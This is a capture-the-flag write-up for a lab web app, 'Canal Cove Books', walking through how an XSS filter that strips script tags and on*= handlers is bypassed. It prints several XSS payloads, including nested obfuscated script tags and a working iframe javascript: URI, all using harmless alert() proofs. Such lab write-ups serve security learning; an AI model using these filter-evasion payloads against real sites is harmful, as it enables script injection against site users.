Canal Cove Books
The owner watched a tutorial on XSS and wrote two regexes. Two.
Room Description
https://dashboard.webverselabs-pro.com/challenges/canal-cove-books
Scenario
Canal Cove Books is a neighborhood used-book shop with a search over 40,000 titles. The owner added "security" — strip <script>, strip on*= handlers. He reads Hacker News now. The one thing he didn't account for is that not every way to run JavaScript looks like a script tag or an event handler.
Objective
The owner watched a tutorial on XSS and wrote two regexes. Two.
Initial Analysis
Hey-ho! From the description of this challenge I have a feeling I know how this is going to go, especially after solving Banyan with different methods.
We have a web application that curates second-hand used books.
From the nav-bar we have the following endpoints:
<nav class="cc-footer-nav">
<a href="/">Front page</a>
<a href="/find-request">Find-request board</a>
<a href="/staff-picks">Staff picks</a>
<a href="/hours">Visit</a>
</nav>
Nothing that stands out really on the dashboard, there's a section at the bottom called staff-picks which I am sure mirrors the endpoint.
Finding the bug
/staff-picks
This is just a static page that has a grid of books that are chosen by the staff.
/visit
This is just another static page with visitation hours.
/find-request
Now this looks interesting!
A page where we can request a book and they will notify us.
<form class="cc-request-form" method="post" action="/find-request">
<label class="cc-field">
<span class="cc-field-label">Title / author</span>
<input name="title" placeholder='e.g. "Ada or Ardor" — Nabokov, hardcover' autocomplete="off" required>
</label>
<label class="cc-field">
<span class="cc-field-label">Your email (optional)</span>
<input type="email" name="email" placeholder="[email protected]">
</label>
<label class="cc-field">
<span class="cc-field-label">Notes (condition, edition, dust-jacket preferences)</span>
<textarea name="notes" rows="3" placeholder="Any first-edition is fine. Prefer a decent dust-jacket."></textarea>
</label>
<button type="submit" class="cc-btn">Post to the board</button>
</form>
The form is as above, let's input anything and see where we get our inputs reflected. I assume the recent posting section.
Yes, that's exactly where.
We sent the following payload:
title=test&email=minatour%40gmail.com¬es=test
The only place in the frontend where our input gets reflected is here:
Exploitation
We can try basic payloads like:
<script>alert(0)</script>
<img src=x onerror=alert(0)>
but the description explicitly mentions that they are stripped away. For funsies, we can try a semi obfuscated <script> payload like:
<scr<script>ipt>alert(0)</script>
Unfortunately, it didn't pass.
I also decided to try to be a little funkier.
<<script>scr<script>ipt<script>>alert(0)<</script>/scr</script>ipt</script>>
and managed to get the following output:
<p class="cc-req-title"></scr</script>ipt</script>></p>
and unfortunately, it doesn't work either, there are many obfuscation methods that are really nice to try to figure out your XSS methodology, but this challenge doesn't require that, it just requires you to know different types of payloads, such as the following: Consuming tags
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#consuming-tags
but that still has an event handler inside, luckily iframe's allow different kinds of payloads if there is a possibility to insert them in, like:
<iframe src="javascript:alert(1)"></iframe>
This is based on:
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
IFRAME¶
If iFrames are allowed there are a lot of other XSS problems as well:
And there we go ^^, flag received.